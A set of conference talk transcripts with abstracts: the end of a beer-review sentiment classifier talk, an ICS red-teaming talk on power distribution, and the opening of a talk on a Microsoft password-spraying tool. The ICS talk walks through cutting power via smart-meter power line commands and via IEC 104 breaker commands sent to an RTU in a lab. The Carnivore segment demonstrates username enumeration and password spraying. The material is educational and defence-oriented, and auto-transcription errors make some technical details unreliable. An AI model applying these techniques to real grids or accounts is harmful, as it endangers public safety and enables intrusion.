brewmaster but the beer critic. And look at how we can use this to classify different information that is in found in these web pages that we have looked through. So we're going to create two classifiers. One is a sentence classifier, which is what we train to know what the different sentences in our documents are. So this classifier is going to help us find out whether it's a description of a beer or if it's a review of a beer or if it's something totally irrelevant to us. While the other one is a sentiment classifier that is going to help us with determining whether the review is positive, negative or neutral. And very often I see people using this to determine as we did with the bias example at the beginning to determine either if something is positive or negative. And I think it's very, very important to also have that neutral class in there because when working with these things, nothing is really set in stone. There are lots of gray areas in between and you need some bag to put that in as well. So you need that neutral, even if you're just interested in positives or negatives, you want to put something that say I don't know. And that's another thing about this is that we just saw that it takes time to actually build the classifiers, but it takes tons of time to train them. And as we're using them here, we're using them in a rather naive manner and we're going to see that in play quite soon. So this is very similar to what we did when we trained these things. So we just grabbed a list of review pages that we have and go through each of them and then just open it, grab the sentences and iterate through each sentence and extract the features. But instead of telling it what the feature was, we ask it to tell us what it thinks this is. So we do that just as we did with Bayez earlier, use the sentence classifier and ask it to classify based on the features that we have. Now, it's very important that the features we use here are the same style of features that we use when we train this. And then just print it out. If it's a review, just keep that around and classify the review as well. And finally, make an assumption of whether this is a positive, negative or neutral review based on how many positives or negatives or neutrals we've seen throughout. We need to run the right file, sorry about that. So we're going to run bare critic. So it starts off with Sam Adams Imperial White and probably pulled this up a bit. It goes through, tells us that these things are other sentences. This is a description. Yeah, it actually is. It says something about redesign of the label. So forth makes a couple of mistakes says that this is a review. It probably isn't. So forth, but review, it's really quite nice. They're really good too. This to me just skimming through this, it sounds rather positive and this thing agrees. It says it's positive and if I'm for positive instances in here, we can go on. This if I'm to positive instances. This is probably going to be a bit biased towards positive reviews right now. It looks right here. It didn't find anything. It only found found descriptions, which is ghostface killer. I guess that's by the hip hop artist ghostface killer. No, it's not. And this is where it comes into the picture, the importance of training these things properly. Because the way we've been using them now is that we have trained them just telling it that this is positive, this is negative and so forth. And it's going to place weights on that and it's going to do its best trying to look for patterns of words appearing together in different sentences. And looking at, I've seen something similar to this before. In that case, this was a positive review or this was a description. And since this is natural language, things are going to differ quite a lot based on the writers different styles and so forth. Which is something that the computer has a really hard time understanding. When we read this, we have quite a good lots of experience and we are pretty smart. So we detect things like irony. Hopefully we detect things like irony in there. Computer does not. So one of the things that you need to do whenever you do a practical application of this is that you need to work a bit on the text as well. You need to help the computer along. So one of the things that you probably would find yourself doing is that you would maintain a dictionary of phrases that you know to be extremely positive and increase the weights of positive whenever those are there, similar for negative and so forth. To basically cheat a little and help this be more precise. But we're not doing this today since we're just showing the sort of simple features of this. And it's basically a good idea to drink beer to get those big ideas. And this is a good opportunity to play around. Because as I said, for those of you who can't live without the safety net of test driven development and having control of everything, this might not be for you because this is a living thing. Sort of like the yeast that goes into this. There is a brewery in Kansas that I'm very fond of which makes a series of brews that are called Love Childs. They're all strictly one offs because they can only make them once. And those are wild yeast brews. So what they do is that they have a batch of barley on whatever they put out there and let it absorb microbes from the air and start a yeast or the brewing process from that. So you get a total random results. Sometimes it's good, sometimes it fails totally. And it's a bit similar to what we do with this. Since the algorithms are only going to know the information they have been trained on, and when we go out and grab things from blogs of the internet, it's going to be totally random and it's going to be biased to the mood right it was in at that day. I've seen things in these blog posts where the author is really pissed off about something, but whereas a really good review of one of his favorite beers and you're going to have something that sort of swings both ways in there, it's going to be hard to determine just looking for positive words and negative words and so forth. So if you go down this route and try to play around with this, you're going to have to expect to find yourself experimenting quite a lot to hit that little sweet spot. But most of the techniques you see in today's from a little pet project I have that I've been working on for years, and the scenario said I'm doing there are very similar to what we're doing here. I'm extracting information and turning it into something structured. And all that comes from blog posts which are written by tons of different people, tons of different writing styles, even different dialects they've written and so forth. And whenever I've been working on that, I've been spending most of my time just tweaking these little things all back and forth. So don't expect something like this to be easy even if it looks really easy to work with libraries and so forth. And expect to fail quite a few times before you get this thing behaving sort of like an intelligent thing. So since I was the only thing standing between you and what's ever down there, I just want to thank you guys for showing up. I hope I've inspired some of you to try and play around with a domain of computer science that most of us never see or never touch. This can actually be useful for quite a few things, even within the enterprise domain where everything is databases and so forth. Netflix uses this all the time, but all the big boys use this. Facebook uses this a lot. So there are lots of applications for this. I've used it many times if you're wondering about what I've used it for. Come speak to me later. So I don't know if you guys have any questions. Yeah, you do. Similar to linear program. Yeah, it's sort of it's if you're thinking about style, I'm writing the code in. In terms of building up training set and applying it to random data. Yeah, which is basically what you do here as well. So it's sort of a super set of that because you're working within a very specific domain. Yeah. So any other questions? No. Okay. Gonna let you go earlier than you can run them down. There was a big queue for this. So I'm not sure if there's anything left, but go down to the back guys because this thing is awesome. So thank you all for showing up and have a nice party. Katzen Jammer is a really good band. Thank you. Thank you.
|
In this talk Anders Norås will teach you how to use computational lingusitics to make sense of and extract data from unstructured human language texts. The session is structured as a step-by-step, progressive walkthrough where we build a small application which uses computational lingustics and machine learning to determine whether an product review is positive or negative. We'll be using Python for the programming examples, but knowing Python is not a prerequisite for attendes.
|
10.5446/50777 (DOI)
|
Thank you. Hello everyone, this is Jan from Istanbul, Turkey and I am at Sarkand today and we will be talking about playing with electricity and red teaming in power distribution companies or hacking in the power distribution companies. Before getting started, I would like to thank the ICS Village team having us. It's really great opportunity to meet you all. We really like to be part of the community activities all over the world. We also some community activities in Turkey as well. So it's really great to be meeting you all over here. Basically, we have one hour with you and basically we have three parts of presentation. The first part is overview. We will make a brief information, give a brief information about the electricity architecture and power distribution company architecture and give you some scale application architecture on it. And then we will discuss red teaming scenarios and then we will perform some attacks on our simulation lab. Actually, thanks to Sarkand, our simulation lab had some nerve issues. We changed our hardware like four times last three days. But it worked at the end of today and we did videos for this presentation to await any problems. So we will have some videos and we will talk about it. All right, so let's do it. Sarkand, please go ahead and introduce yourself please. Thank you, Jan. First of all, good afternoon for American site spectator and maybe good night or good evening for the European and Asian sites spectator. First of all, I'd like to thank you for giving us opportunity in this beautiful organization and I'd like to express my pleasure being there. Now I will give information about myself. I am Sarkand Tamal. I am an electrical and electronic engineer. I have seven years experience about industrial control systems, systems based on electric distribution, transmission and power generation. For last one year of the my career, I'm focused on the cybersecurity and systems and also focused on the industrial control system, cybersecurity topics. Thank you, Jan. We can go on now presentation. I am also an electronic engineer and I have more than 80 years cybersecurity background and last five years I mostly concentrated on critical infrastructure and I say SCADA cybersecurity. At the moment, we both working for cyber-wise for critical infrastructure cybersecurity at the moment and today, as we mentioned, we will discuss electricity sub-sector and power distribution, red teaming and cybersecurity. All right. We want to start with why electricity matters actually. It's not just for us but for all the rest of the world. It's the backbone of all critical infrastructure. When it fails, it direct effects the data life or modern life fundamentals. For example, it affects health sector, transport sector, transportation and finance sector and so on. Once it fails, it directly affects people and public safety and it's really backbone of the critical infrastructure. We want to take dead parts and we wanted to build a presentation to point. We will be discussing about red teaming in power distribution companies but before it, we need to understand the electricity architecture in process-wise. Basically, it has three parts. We have power generation, we have transmission lines and then we have a power distribution part. Most of the time, power plants and power generation located in the out of the city centers. That means we need to carry electricity long way of kilometers. It means we require the transmission lines and finally, that means we need to power up-down operations. Once we are over from the transmission lines, we came up with the power distribution. Actually, it is the last line of the customer touch. I mean, if something fails in power distribution part, it directly affects customer and our business. To be honest, the distribution companies and electricity distribution process is not too much complicated when we compare the power plants or petrochemical industry. It is easy to attack and also it is the defense. Serkan, would you like to add something? At some point in that presentation, today we tell you the distribution, but I would like to be aware of the point. The transmission layer is a critical part of the electricity architecture because it is a bridge between power generation and power distribution. This is the backbone of the electricity architecture. Today's topics are distribution electricity, but transmission is very critical in the cybersecurity perspective. And actually, it depends over the countries or over the regions. Sometimes it is operated by the government. Sometimes it is operated by private companies. It really depends on the region and countries perspective. But I really agree with you that transmission lines are also the core of the electricity architecture. Thank you. So let's dive into the power or electricity distribution infrastructure. First of all, it's a really great example of the SCADA because you have people, which means the supervisory element of the SCADA, and you have remote locations. As you can see on the screen, there are lots of different substations connected via different types of communication media to your control center or emergency control center. So what we said, it's a great example of the SCADA application because you get data from all over the different remote located substations, and sometimes you control over the remote substations. So on the other hand, you have remote offices like payment offices, headquarters, government agencies to report for, or you have direct integration. For example, in Turkey, Renewables Power Plans has to report the nearest power distribution company for the regulation. Basically, what we can say, there are lots of remote locations we have that we need to control, and that means we need different types of communication media. In distribution companies, we really need to take care of the communication media security as a part of the defense mechanism. On the other hand, sometimes some companies or some governments or some countries has smart meter application, which means smart meters has direct effected electricity. They open and close the electricity via metering control center through the smart meters. Why I'm telling you this? Because it will affect our red team scenarios and understanding the infrastructure. What we need to understand from this slide, we need the loss of high level of connectivity. There are different types of communication media, and we have lots of different type of substitution and equipments. And the rest of it, we have lots of different type of integration. All right, I'm gone. All right, I will give a brief information and pass to Sarcan's stage. We discuss about the electricity architecture, and then we discuss about the power distribution architecture. Now, we will discuss about the SCADA architecture. It's also distributed in the server side. But before jumping into it, we need to understand there's a need of high level of connectivity in such a power distribution company. Sometimes we need to connect the outreach management system, ERP application, call center, and so on. Maybe Sarcan give some example about that. Yes, we mentioned about the previous presentation that we said that distribution, like the distribution, touch the customers. So this means that the distribution company, so many customers works into like customers management, outreach management, VFMs, other stuff, so many stuff for the customers. The reason of that, the distribution SCADA systems must be and have to be integrated IT software applications, like John mentioned, that's OMS. OMS, like VFM, like the other companies, third-party software. Because of that, distribution SCADA systems, LW difference from the transmission and power generation SCADA systems. And also in the distribution network, so many substations. This means that so many data, so many connection stations. So we need the power rule SCADA systems. We have to separate this load to separate servers, like application server, like communication server, like data server, like backup server, and so on, like HMI server. So distribution SCADA systems a little bit distributed and separated structure. It's very similar to IT environment, actually. You have some type of application servers, communication servers. It do some kind of load balancing, and it requires really great integration of IT application or business application. Sometimes it's part of SCADA applications, like the called outreach management system or call centers. They are directly talking or integrating with the RSCADA application. Because once you have a kind of blackout or shutdown electricity, you will get some calls. You need to reach out to customers. You need to get some data from SCADA. So it's really integrated with IT applications, sometimes cloud applications. And on the other hand, you have entrusted parties, like vendors, remote offices, other type of control centers or government agencies. So sometimes it's done via the firewall, sometimes directly connected to your industrial equipments. It really depends on the customer strategy, or sometimes they are not really aware of what kind of communication channels they have. But what we need to remember through here is that RSCADA architecture is distributed as a server roles, and it's like an IT application and it has integration with the business side. And also it talks to the substation through our communication media. So I will leave the comments to Sarkam about substation because he's expertise lots of years. Now we have talked about the substation architecture. The substation architecture is distribution substation process. We have some main devices for the process we use. The first one is RETU. RETU is a telecontroller which connects field devices to SCADA systems. We think as a data concentrator or data transfer devices RETU. Energizer is an energy meter which gets information from the CT and VT transformer from electric sites information and translates in the digital sites and give and directly send this information to SCADA systems. Protection relay, it is a critical equipment in the distribution and also transmission and also generation as you know that. Protection relay is the first IED device, first electronic device connected physical electric system. It is a bridge cyber and physical world. Reason of that protection relay is the most critical parts and most critical device in the distribution systems. As a cybersecurity perspective if you want to shutdown the electricity you have to control the protection relay but maybe you can attack the RETU maybe attack the SCADA systems. It's just blocked our monitoring from the field sites but if we want to control electricity, shutdown electricity or re-energized electricity you have to control protection relay. The fourth device is the smart meter. Smart meter as you know that's for building purposes and maybe low voltage site for customer sites, shutdown electricity or re-energized electricity. The last two devices is physical device. The first one is low-volt circuit breaker. It is controlled electricity line and the last one is the medium voltage criticals means circuit breaker also inside these criticals. It's controlled electricity line, networks. Next slide please. I think yeah yes. Yes we had line IED device protection light device. This is I would like to say it's again because it is very critical. Protection device has two parts one of the heart rate the otherwise the software. The heart rate sites they have unlock inputs, unlock output, digital input, digital output and the other cellular internet interface. Voltage and current information takes with unlock input modules and also control unlock system like set points power like set about the frequency let's set about the voltage you have to send unlock output and digital inputs and digital inputs most critical because digital inputs comes from basically circuit breaker position, isolated position, the other information about the physical systems and digital outputs is control the circuit breakers means that you control the electricity because of that in the scalar systems and most of the communication protocols or animal direction or cyber security perspective we focus on the digital output signal. In the beginning of this device they have serial interface because in that time more Ethernet IP wrote and today most of the device has Ethernet interface and it gains advantage of the Ethernet IP world but it is some cause of the site effect from cyber security this gains of advantages I will tell about later. In the software site communication protocols means that industrial communication protocol like Modbus, like Probus, like IC104, DMP3, the other this helps communicates with R2 or communicate with the SCADA systems to send information to the upper level. Logic functions control the like circuit breaker or other blocking materials functions logic functions and configuration interface this is the critical part of the AID device as I mentioned that they have Ethernet interface and most of AID device nowadays use web service interface for configuration software or configuration interface this is the some vulnerability about systems as a big point of this AID device nowadays. Thank you Sarkam. Actually we always get afraid or get freaked about touch such intelligent electronic devices because as you mentioned one part is physical that controls electricity and one part is cyber it's R2 or SCADA applications and it's like a last line of the physical and cyber breach once you control it you control the electricity you can control it through the R2 or you can directly send commands to the IID or you can trigger some SCADA application set points and it will directly affect the intelligent electronic devices but once you're planning a red teaming or pan testing activity you need to be aware of such a devices can affect the electricity and you need to be really careful what you are playing with. All right so now we can discuss about red teaming approach and red teaming scenarios. Before jumping into the details I wanted to discuss how much red is that because since it's a critical infrastructure since it's a last line of the custom touch can we be really free to be really red teaming in that case the most of the asset owners and most of the cyber security companies get afraid to avoid the consequences of that thing happens. So I may say that nobody does directly red teaming maybe it's like light pink teaming let's say because we really need to be aware of that the public safety and process safety is much more important than your color activity so you really need to take care of the process you really take care of the public safety because we always think in a that way if we shut down electricity for the hospital and if we kill someone in that hospital because of no electricity so it really has a great boundary for us to do our tests or pan testing activities or red teaming activities in a controlled way so it's not really red light pink maybe but to understand each other in a better way I want to express that part as well so I would like to mention about the core steps we divided into five main steps actually we discussed about the first two of them to understand the process understand the architecture once you do any red teaming activity in any kind of ICS infrastructure in that case we are talking about the power distribution we gave brief information about the electricity architecture distribution architecture skate architecture and substation architecture and we thought that power distribution companies process is not too much complicated we have very limited type of signals compared to power plants and petrochemicals so it's a really easy process to ease the attack and use the defense now we need to define our landscape and then we will try to create some kind of scenarios to directly develop for direct teaming activity usage and then finally we will perform some kind of attacks in our simulation lab I don't want to talk about the IT based or getting into the IT and then jumping into OT kind of red teaming activities or landscape but once you are talking about the power distribution red teaming we wanted to give you brief landscape information that what you need to know what you are going to face and how it will affect your planning so basically we have eight categories that we will discuss today the first one is protocols there are different types of protocols you will see in the field in the distribution companies basically in skater parts I mean the wide area network you will see ISC 104 and TMP3 and substation level you will see different types of protocols sometimes schools MMS and so on and upper level and supervisor level you will see soft pass and the control level you will see mobus tcpr2 even sometimes serif protocol and then if you have smart meters and even in skater application you may have the power line communication it's not it's still plc but it's different term we will discuss it today as well and then we said that communication media is very important if you get into the communication media somehow let's say you get into the apn network based on gsm or you get into the RF signals and you then directly interact with substations interact with R2s and interact with control center equipments and emergency control center equipments so communication media is also too much important for us to uh rectify planning on the other hand you need to be aware of the third part integration there are different types of integration it depends on the country and region and the regulation you see some of them in our list and also as a set owner you have some kind of remote locations or local locations like control center, energy control center, material control center, headquarter, payment offices or communication center for like RF towers so asset owner locations also matters to us on the other hand substation is very important for us because it is remote located and physical and cyber control is very limited compared to control center or emergency control center or headquarter in that case you will be facing with industry protocols on institutional devices and you may apply some kind of hopping attacks what I mean by that you once you get into the specific remote substation you can jump over the other substation you can jump over the control center or emergency control center you may create some tag signals it's like coming from the old remote substation and so on so it's very great and point and great defense point for us and but I should stress out that in substation we have some physical controls for example if someone opens the door or if someone opens the cabinet if someone moving in the substation it creates some alerts and sends signals over the one or four of the control center so we still have some type of controls that we need to be aware of when we plan associate activities or when we plan red teaming activities on the other hand technology I'm sure that all the villagers have a proper knowledge of them I don't want to express each of them because it's like the IT wise pan testing or red teaming because it's server network devices and some kind of field devices so I don't want to go each of them and on the other hand we have people for example in Turkey we have a specific regulation for assessment in the power generation and distribution companies and it requires social engineering activities for the energy people let's say the asset owner people sometimes we see that some red teaming activities hit the vendor engineers or OT partner engineering company engineers so and people's segment is also really a very and different types of mechanisms they have for example in Turkey we need to do physical pan testing we need to do phone calling we need to do email based social engineering all right and done by the regulation and also yet another landscape for us the industrial process and we will discuss it yet in another conference because since it is the less signals and it's less complicated in the power distribution and power industry the industrial process vulnerabilities may affect public safety directly so we avoid to mention the entry points of process vulnerabilities but we can discuss it later in for another industries on the following days all right so I hope we understood the process we understood the architecture and defined some kind of landscape again it may change the region country and regulation but we need to understand the basics of distribution so we need to create some kind of scenarios in this presentation we created three types of scenario we have created a specific table for that I will discuss it through them and it's again not IT based red teaming or pan testing we try to create some kind of directly effect on electricity based scenarios so in the scenario we have a chance to work with our IoT team leader and hardware security leader with Fatih Khairan actually he developed this scenario and applied in the field once upon a time we were in the distribution company and came up the idea that we figured out somehow the smart meters were controlling the city's electricity which means if we could find a way to send a proper comment smart meters it will directly shut down the electricity in that case the dead smart meters were talking through the power line communication and so we created our scenario based on this so to understand the team mates to each other in a better way we create such a table to define our success criterias difficulty factors and decide if the chain is required or not I will go through the one table and I will pass through the rest of the it because we will perform a real-time simulation for the rest of it in this scenario we targeted the shutdown electricity but before jumping into that we classified our tactic and techniques based on my tree manipulation of control and manipulation of weave and our entry points was smart meters power line communication complexity in this scenario was high difficulty was high because unknown protocols were there specific hardware design is required and high voltage work environment is can be dangerous because we lost one of our laptop and one of our team member got injured during this test because we work with the high voltage directly with the plugs and to better understanding you plug the smart meter into the city network so you turn into that specific smart meter into weepen to target the electricity for better understanding I will discuss it through this presentation so dependency was the communication interface reverse engineering or protocol reverse engineering required time was high for us and also what was our success criterias understanding protocol send and receive packets on the power line send command cutoff the electricity for a defined area sometimes we create some so c success criteria for our customers to detect better the next attacks in that case it could be hardware or smart meter log management oms log management core center log management or smart meter replication log management could be a success criteria in that case we defined log sources for redeeming activities and then we define a purpose method and a kill chain activity in that case our purpose was shut down the electricity via unexpected point of entry through unexpected communication media turn plug and matters into industrial attack equipment so our idea was simple so power line communication works through the power signals you modulate it and put your data into the electricity signals so it directly talks through the electricity in I think there yesterday there was a specific session about that in that case we will look into the how it's used in distribution companies in that case we have the power concentrator which is directly connected to different types of customers almost tightening and there are smart meters and there are some power line communication interfaces and it connects to the backend system through the APN in that case over the internet so guess what it was the broadcast messages going through the specific power line if we have specific hardware you can develop it or you can turn smart meter into the your tool in that case we made it and we were under we were able to understand the reading data and the shutdown the electricity commands so since it's broadcast each of smart meters get the data and once you give order everyone gets the order but one of them apply it and report back to center so once you sniff the data you see the smart meter ID and in that case the power line communication we're using the dlsm-ksm protocol in that case that specific number defines the shutdown the electricity command like double command in one or four very similar and also in that case we were able to get readout data in in this case this is readout code for dlsm-ksm protocol what we are trying to say that you don't directly attack the SCADA application R2 user IEDs the best way and easy way find the yet another proper line end of your goal so in that case the power line communication and smart meters gave us a chance to shut down the electricity but you need to deal with high voltage electricity you need to deal with power line communication new type of protocols modulation demodulation and encryption type of things require much more time but most of the time the acetoners and the pentesters doesn't pay attention on the deck channel so you really create a volume for your customer and people safety in that case so as I know the European countries also have great implementation of smart meters we need to take care of these standards as well okay so our last two scenarios based on the R2s and industrial protocols we will show how to do it industrial red teaming in a real lab environment which took days for Serkan and got all during these sessions basically we have two different scenarios for this presentation one of them extracting data from config files without further reverse engineering or further implementation of anything and think about that you have some type of configuration files you don't have any access to OT environment or substation yet but you will figure out some type of data to plan your next session of red teaming activities we have a specific example of that since I discussed a deeply and very detailed the last table I don't want to discuss it the losing any time on that so I will jump into the next one because we will discuss it real scenario to get another scenario for this session is the remote substation protocol attack in that case the attacker needs to interact with the substation equipments it can be done and via Raspberry Pi implementation and connect through the Wi-Fi and so on like we did in our lab environment and we will shut down the electricity using the protocol commands once we understand what kind of protocols used and how once we understand the protocols we will figure it out to where the center data and final center data to shut down the electricity to have better understanding each other what we are trying to say if you are planning to work teaming activity in a power distribution company or assessment you need to understand the process you need to understand architecture you need to understand landscape once you have a tree element then you can create your scenarios you need to think out of the box but that box doesn't mean you can go out public safety rules or process safety rules so it's really hard to balance and we want to give you some simple ideas to reach out your end goal rather than implementing some IT based or IT related red teaming activities I think I can be free from now and put second into fire as a tradition we face to face with the Murphy's room but finally we succeed on the setup of lab now I have you information about lab setup it's a very simple part of substation process we have one arches abd140 and one id device one scada server scada pieces and also one switch we use cap player software as a scada master and also we use mod plus tc protocol and also is one over four protocol mod plus tcp use in id device between r2 and is one over four we use it r2 between scada sm cap player device the tricky part is the heart implemented hardware substation as an attacker we think that we have some Raspberry device or the other device as attacker machine before jumping into the tails I would like to mention that this setup doesn't indicate any one of these on abv arches it's just a simple arches that we could use on the market and we know how to configure it so we will do some protocol based simulation but it doesn't just affect the abv it's based on we leverage of the protocol usage actually to avoid any misunderstanding and also it is very common r2 used in europe and asian sites this and also this is the second reason we choose this r2 now we can jump into the laps video all right so we will start with interfaces and signals the first video is about configuration r2 I jump into that just a second yes we use r2 until 500 software for programming criteria configuration r2 we created it before an open existing project this part a little bit takes time it may be boring they hide the project file deep inside my file system yes and Turkish character error now this is the r2 util 500 software interface this is the network tree we have three communication line one is is one of four for scada communication the other one is mod plus tcp for id device mod plus communication line you can easily see that some parameter of the communication protocol yes it is the one on four communication protocol setup as you see that's astro address astro address structure inform structure maximum length of id and then this is the mod plus tcp side configuration this is network tree now we in hardware tree in the hardware sites we choose our r2 main cpu model and also we add the field level signal information in that site hardware site and also as you see that the mod plus communication configuration zone this is the ip address of the id device and also the again one of four configuration section now this is the r2 interfaces this is the day it has two eternal interfaces as you see that ip address of the interfaces and this site we configured our field level signal like active power that is the mod bus site retolding register index number 13 and this is the scada is one of four sites astro address one information object address 103 and the other single like phase a current phase b current we record all and show the all parameters of the signal because you may want to online and maybe you want to replay your own lab so if you want to give you brief info the other sections will be much much faster let's say but once you understand that part configuration and it's much more easier to understand the rest of the simulation this is the type of the mod bus signal as you see that force commands signal commands and register read call status with cost as used for the information single point information digital input like position of circuit breaker and switch control means that sense control command to circuit breaker power limit set points and the other meter inch information phase a current phase b current phase c current it's a very simple model of the substation so we can jump into the second report in this report we directly connect the retu web interfaces as you see that's this is the ip address of the first internet interface use username and passport in that set you can easily see that configuration management site you'll see that the configuration file which configuration is now active when you update this configuration file and also gets configuration file from the device and also delete this configuration etc and also direct on sites you can easily monitor signal system log system event status and client station look and also hardware tree hardware tree is the live monitoring about r2 especially in the site you see that r2 is active r2 is operable means that it's connected to ied device as you see that's cpi switch position is on and also meter inch information about systems it's live data real-time data now i can talk about a little bit configuration file if you wish our third video related to configuration file and extracting some data again it doesn't integrate any wonder with t-zone to r2 but somehow if you reach out backup systems or if you reach out the file server and the it system once we have a configuration file now we will download it and extract some data from it it's really easy actually before furthering reverse engineering implementation in that case we are not into the remit substation we are not in the control room somehow we get data about the configuration file it can be engineering workstation part server again or backup system maybe a engineering partner workstation once i get the configuration file i am directly able to see what kind of r2 is used what version and what purpose they are using what kind of interfaces and what kind of ip addresses they have and sorry and also what kind of protocols they have it will affect my further planning actually in your red teaming activity what kind of devices connected to that r2 in substation and what kind of signal parameters they are looking for it so once i have that information without any probing any scanning activity or any physical attachment it's really the average of your efforts once you have that kind of specific knowledge we have also some specific projects that reverse engineering to read all the data not not people readable format at the moment you have much more better information and knowledge about the targeted system so in that case we want to show you you don't need to go to the control center of remote substation somehow if you are able to get config files you may read directly with the not pet plus plus and read some data understand the process understand the protocols interfaces and plan a better red teaming activity or targeted attack into the targeted system so i will jump into the your part sir i can yes before we do is about the normal traditional application and communication with scada systems and retu first of all i will show to my ip address and same subnet with r2 interface one and then we use set before kept server as a scada software scada master program this is the configuration of the master sites kept their sites kept server sites configuration file as we see that communication address common address advanced settings network interface as we have same subnet same address more advanced parameter for ac1 and 4 originator address like and also network interface network interface means that it's the red ip of the radio and the port of the is one of our port and this site we also configure our signal this means that it is analog short float volume astralis one of three and so it is the breaker control commands command single command means j say j actually it will directly affect the open and close uh breakers uh later then we will apply some scenarios it's really important to understand what type of parameter and what type of commands they take how we connected to our cheer as you see that this is the real-time data as you see active power 2400 and also breaker control is zero breaker position is one means that the closed now we sent the breaker control control command is one yes it takes the commands in the real-time and real-time operation when we sent this command we reanalyzed circuit breaker or shut down the circuit breaker with this command all right now and also I would like to show some wire shark track trafics between kepp wire and re2 this is the alternates we apply our display filter for is104 yes as you see that this is the test frame in the protocol so now we re-sent the command again and show the traffic yes this is command single command astralis one over seven as you see that this is the wire shark single command address is one i address is 107 and also set command value is zero as you see you can easily get this information from the wire shark because the is104 is an open text protocol not encrypted or hashing port hash protocol you can easily get information from the traffic in that case you see that the single or double command take place in is104 in that case we sent a specific shutdown or open command in a targeted area in case it was zero it means we shut down the electricity through a legitimate traffic I mean it was a traffic generated by the control center now we will try to apply as an attacker point of view who is in the remote substation via implemented hardware this is the five video of us yes we have information about the second interface about r2 now in the attacker machine I configure my IP address for the second interface of the r2 as you see now I use mmap for some research and some search functionality or open ports in that case we are looking for who has an is104 in that case in that protocol use specific ports if nobody changes so we are looking for in same subnet if someone has that specific protocol please be aware it's an attacker point of view and got into the substation looking for some is104 endpoints and two devices we found it this is the r2 device as you see from the IP address and also is104 is open port and also services up but now we have only information about r2's protocols and r2's ip address but we don't any information about the signal and signal address now we use capware again we configure capware again as you see we tried it one now it's connected to r2 now in the protocol structure we have a general integration command when we send this command r2 get a response and sends all information about in this r2 insight we send gii command to the r2 I don't know any information about the object address but when we send this command r2 response to this commands and now we can easily observe which address and which type of information inside of it as you see that so this is one IO address is 100 and value is also as you see 332 etc etc so basically protocol gives an opportunity to us to pull all kind of signals and data from the r2 for a specific protocol line as an attacker we use the exact same tool but it's simulation environment again you can use your lab environment that specific tool yet another tool we have it's developed by I think the master degree student in Germany called ISE test and to be make sure all of you we will send the latest command through the that specific tool call next again r2 now we send command again get information from terrific and also we sent commands to 107 as you see from wire shack traffic we sent commands and also on of on commands and also as you from terrific it is action confirmation from r2 in number of line 18 and 37 jcs cna x confirmation as you see this means that's r2 accept this comment basically resist this comment once you get into the substation you pull data through the protocol and you send the command through the protocol again in that case single commander double command supported by the 104 and then you are able to shut down the electricity in that case if it's your end goal you may apply very different type of scenarios and redeeming activities but we want to show you that it can be done there are some safety mechanisms or configuration mechanisms to avoid it sometimes you implement the IP based solution or animal detection solution to call that kind of activities so in the station we are end of our presentation with takeaways we would like to stress out during great teaming activity we need to think out of the box but we still need to take care of public and process safety it's really a rule of thumb for us power distribution environment is not complicated as process wise when compared to power plants or petrochemical but it has directly affected the other critical infrastructures and customers directly power distribution companies have lots of different interdependencies therefore information gets a square role for redeeming activities and power distribution companies is a target and is a defense compared to other ICS infrastructure so we have two minutes left if you have any questions please feel free to ask we will be on discord as well as well as well as we can so Sarkand if you have any comment please do it or we can get to us if you have any questions we are we will be in discord we will be happy for your answer for your questions John and Sarkand thank you for your talk I noted in the discord speaker Q&A that I consider this a mandatory talk to watch for both learning about 101 and assessments so really appreciate you all dying dialing in and supporting us thank you very much having us I hope you enjoy
|
Hacking Into distribution companies.
|
10.5446/50828 (DOI)
|
Hello, my name is Chris Nevin and I work for NCC Group. So this tool is called Carnivore. So that's a Microsoft external attack tool or assessment tool. So the cryptozoologists amongst you might know this, so that spells meet. So that's very amusing. And it's basically a tool to help pentesters find misconfigurations and vulnerabilities in Microsoft on-premises servers. So also apologies if I talk quickly, but there is quite a lot to get through. So the basic outline of the presentation. So I'm going to start with a demonstration just to show what the tool can do and then dive a bit deeper into some of the techniques and the research behind them after that. So now intro demonstration. Okay, so first a quick overview just to give you a taste of what the tool can do. So just before I kick it off, we've selected all services and we're also going to attempt to discover the internal domain information. You might notice that it's a.nev domain. Obviously that wouldn't normally be a top level domain, but this is my training lab. So first of all, it's going to look for DNS, sorry, do DNS lookups for subdomains which are normally connected with a particular service. So for example, link discover with Skype, then it verifies there's something there. So it's not just a wildcard resolution. And then it also does some checks to make sure is does it also actually seem to be an exchange or a Skype server. So I've also built in some kind of bailout options. So for example, if we get back a server header saying that it's njinks, it's not even windows, we don't need to test every possible endpoint just in case one of them is a Skype server. So yes, so that's something that we do. So it also validates the username enumeration and the password spray URL separately. I'll come on to that in a little bit. But basically there are occasions where an organization might have hidden most things, but there'll be one password spray URL kind of hidden away. So we try the most obvious and then if they don't hit, there are other kind of password spray endpoints that are possible. So yes, hopefully if an organization has something exposed, then we'll be able to find it to report to them. So we also log everything here and you've got export options. If you want to kind of manually export things for some reason, I'll cover Office 365 more at the end. But for this section, if Office 365 is ticked, then it will explicitly check if this has any kind of cloud presence. Even if it's not ticked, then the response to Skype for Business, for example, might come back and say, I'm hosted in the cloud and then we'll still do the standard kind of checks for is it federated and that kind of thing. And then it will add. So say we just did Skype for Business. It says it's in the cloud. It turns out it's federated. We'll get an Office 365 and an ADFS option here. So, okay, so we've also got global verbosity here. So you can kind of tweak that up and down depending on what you want to see. Okay, so let me kick this off. Okay, so the other thing with this Discover internal domain, then it does the fairly standard blank type one until message. And you can see it's pulled back the internal domain name. So at the moment it does that individually for each of these services. And that's because, you know, Skype might be hosted in Germany and ADFS server, the ADFS server might be in Canada for some reason. And so when you're hitting when you're spraying that server, then you've got the internal domain information for the particular server that you're hitting. And in fact, even on a job just last week, then these were all different. So it does happen quite frequently. I might add some kind of advanced options. So you can say just assume they're all the same. But like I say, that's maybe, you know, a recipe for potential disaster. So, okay, we've also got the IP addresses here. So you can obviously check those against your scope. And if you want to, you can kind of run this once, check the IP addresses against your scope, and then do the more active kind of blank until I'm one message. And so for the other thing to mention is for Skype. So link discover is the kind of auto discover service. And that actually points to the real server, which is what we want to hit. So that's why there's two kind of entries for Skype there. So we've now got Skype exchange, ADFS and RD web. So I'm going to show you a quick run through of username enumeration and password spraying, just to give you an idea. So smart enumeration, we'll leave it on the defaults. And we're also going for password one, just kind of standard. So you see there's quite a lot of usernames to try here as it's going through. We found one of a particular format. So it's now continuing to loop through nine different formats. And you'll see that when we discover the correct format, then this will drop drastically because then we switched to just using usernames of that format. So we've now got two of the same format. So first initial surname. And now we've got three. So you'll see that it's now selected that format of J Smith. So everything we do, oh, sorry. We left that continuing, it would just be, as you can see here, it's now less usernames and it's just doing usernames of that format. So now I'll quickly show you password spray as well. And so I'll use that same format J Smith. So for the password spray, that will now spray that in the kind of modern style username 